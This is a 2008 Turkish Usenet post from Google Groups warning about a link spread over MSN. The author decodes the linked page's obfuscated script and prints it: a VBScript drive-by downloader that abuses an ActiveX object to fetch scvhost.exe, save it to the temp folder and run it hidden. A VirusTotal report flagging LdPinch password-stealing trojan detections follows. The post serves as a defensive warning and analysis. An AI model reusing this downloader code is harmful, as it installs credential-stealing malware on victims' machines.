Google Gruplar Giriş
Yardım | Oturum açın
internet guvenligi
Ana sayfa
+ yeni gönderi
Sayfalar
Dosyalar
Bu grup hakkında
Bu gruba katıl
Msn üzerinden yayılan yeni virüs dalgası...
Seçenekler
Şu anda bu grupta ilk sırada gösterilen çok fazla sayıda konu var. Bu konuyu ilk sırada göstermek istiyorsanız, bu seçeneği başka bir konudan kaldırmalısınız.
Talebiniz işlenirken bir hata oluştu. Lütfen tekrar deneyin.
bayrak
   1 ileti - Tümünü daralt
İleti gönderdiğiniz grup bir Usenet grubudur. Bu gruba ileti gönderdiğinizde İnternetteki herkes e-posta adresinizi görecektir.
Yanıt iletiniz gönderilmedi.
Gönderdiğiniz ileti yöneticiler tarafından onaylandıktan sonra görüntülenir
Burak ŞEKERCİOĞLU  
Profili göster
  Diğer seçenekler 25 Mart, 14:26
Kimden: "Burak ŞEKERCİOĞLU" <bsekercioglu...@gmail.com>
Tarih: Tue, 25 Mar 2008 14:26:00 +0200
Konu: Msn üzerinden yayılan yeni virüs dalgası...
Yazarı yanıtla | İlet | Yazdır | Kişisel ileti | Aslını göster | Bu iletiyi bildir | Bu yazarın mesajlarını bul

Bu gün bana msn üzerinden bir link gönderildi
mesajın içeriği ise aşağıdaki gibiydi

Ulkemize destek icin oy kullanalim. Es gecme lütfen.
http://www.francenatural.fr/turkey/

siteye girdiğimizde bizden Microsoft - Data Access activex nesnesine onay
vermemiz isteniyordu. Buraya kadar herşey düzgün ve normal duruyordu ancak
dikkatimi çeken şey sitenin fransa kökenli ve Türkçe olmasıydı. Sitenin
anasayfasına baktığımda ise şarap tanıtım sitesiydi.

hemen huylanıp geri döndüm ve sayfa kodlarını inceledim.. ama sayfa kodları
javascript encode ile kodlanmış şifreli durumdaydı. Kodları 4 sefer encode
yaparak şifrelemiş olmalarına rağmen decode yaptım ve html kodlarını
incelediğimde

<script LANGUAGE="JavaScript">
function CC_noErrors() {
return true;

}

window.onerror = CC_noErrors;
</script>

<script language="VBScript">
on error resume next
dl = "http://www.francenatural.fr/scvhost.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="scvhost.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
</head>

kodlarını gördüm. bahsi geçen linkten scvhost.exe dosyasını çektim ve
antivirüs ile kontrol ettim ancak virüs yoktu... kendi sitem üzerindeki
online tarama ile kontrol ettiğimde ise aşağıdaki rapora ulaştım.

File scvhost.exe received on 03.25.2008 13:13:31 (CET)
Current status: Loading ... queued waiting scanning finished NOT FOUND
STOPPED
 Result: 14/32 (43.75%)
 Loading server information...
Your file is queued in position: 4.
Estimated start time is between 47 and 68 seconds.
Do not close the window until scan is complete.
The scanner that was processing your file is stopped at this moment, we are
going to wait a few seconds to try to recover your result.
If you are waiting for more than five minutes you have to resend your file.
Your file is being scanned by VirusTotal in this moment,
results will be shown as they're generated.

    Antivirus Version Last Update Result AhnLab-V3 2008.3.25.0 2008.03.25 -
AntiVir 7.6.0.75 2008.03.25 - Authentium 4.93.8 2008.03.25 - Avast
4.7.1098.0 2008.03.24 - AVG 7.5.0.516 2008.03.25 Generic9.BBRO BitDefender
7.2 2008.03.25 - CAT-QuickHeal 9.50 2008.03.24 Backdoor.Sdbot.509 ClamAV
0.92.1 2008.03.25 Trojan.LdPinch-1835 DrWeb 4.44.0.09170 2008.03.25 - eSafe
7.0.15.0 2008.03.18 - eTrust-Vet 31.3.5641 2008.03.25 - Ewido 4.0 2008.03.25
Trojan.Buzus.hs F-Prot 4.4.2.54 2008.03.24 - F-Secure 6.70.13260.0
2008.03.25 W32/Malware FileAdvisor 1 2008.03.25 - Fortinet 3.14.0.0
2008.03.25 W32/LdPinch.GHI!tr.pws Ikarus T3.1.1.20 2008.03.25
Trojan.Win32.Buzus.gv Kaspersky 7.0.0.125 2008.03.25
Trojan-PSW.Win32.LdPinch.ghi McAfee 5258 2008.03.24 - Microsoft 1.3301
2008.03.25 VirTool:Win32/DelfInject.gen!X NOD32v2 2970 2008.03.25 - Norman
5.80.02 2008.03.20 W32/Malware.CBCD Panda 9.0.0.4 2008.03.25 Suspicious file
Prevx1 V2 2008.03.25 Generic9.BBRO Rising 20.37.02.00 2008.03.24 - Sophos
4.27.0 2008.03.25 - Sunbelt 3.0.978.0 2008.03.18 - Symantec 10 2008.03.25 -
TheHacker 6.2.92.253 2008.03.25 Trojan/PSW.LdPinch.ghi VBA32 3.12.6.3
2008.03.25 Trojan-PSW.Win32.LdPinch.ghi VirusBuster 4.3.26:9 2008.03.24 -
Webwasher-Gateway 6.6.2 2008.03.25 -  Additional information File size:
548437 bytes MD5: 676f6872085b4a4b85927e39f7a8143f SHA1:
801940ac4a736d980e00a037fd447b454f1c2701 PEiD: - Prevx info:
http://info.prevx.com/aboutprogramtext.asp?PX5=63CAAA4555C97D6E5E6F08...

Görüldüğü gibi virüs şifrelenerek gizlenmiş TROJAN virüsü içeriyordu.

Lütfen dikkat edelim ve bu tür tuzaklara düşmeyelim

iyi çalışmalar

--
--------------------------------------------------------------
http://www.sekercioglu.eu/
http://knowfree.net/


    Yazarı yanıtla    İlet  
İleti gönderebilmek için önce Oturum açmalısınız.
İleti gönderebilmek için önce bu gruba katılmalısınız.
İletinizi göndermeden önce lütfen abonelik ayarları sayfasında takma adınızı güncelleyin.
İleti göndermek için gerekli izne sahip değilsiniz.
İletilerin sonu
« Tartışmalara Dön « Daha yeni konu     Daha eski konu »

Grup oluştur - Google Gruplar - Google Ana Sayfa - Hizmet Şartları - Gizlilik İlkesi
©2008 Google